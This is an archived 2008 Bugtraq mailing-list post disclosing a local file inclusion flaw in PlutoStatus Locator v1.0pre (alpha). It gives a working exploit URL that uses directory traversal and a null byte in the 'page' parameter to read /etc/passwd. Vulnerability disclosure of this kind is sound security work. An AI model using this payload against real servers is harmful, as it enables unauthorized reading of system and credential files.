[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
PlutoStatus Locator v1.0pre (alpha) local file inclusion vulnerability
- To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: PlutoStatus Locator v1.0pre (alpha) local file inclusion vulnerability
- From: "muuratsalo experimental hack lab" <muuratsalo@xxxxxxxxx>
- Date: Thu, 14 Feb 2008 21:01:38 +0100
PlutoStatus Locator v1.0pre (alpha) local file inclusion vulnerability
download http://sourceforge.net/projects/plutostatus/
author muuratsalo
contact muuratsalo[at]gmail.com
exploit
http://localhost/locator/index.php?page=../../../../../../../../../../etc/passwd%00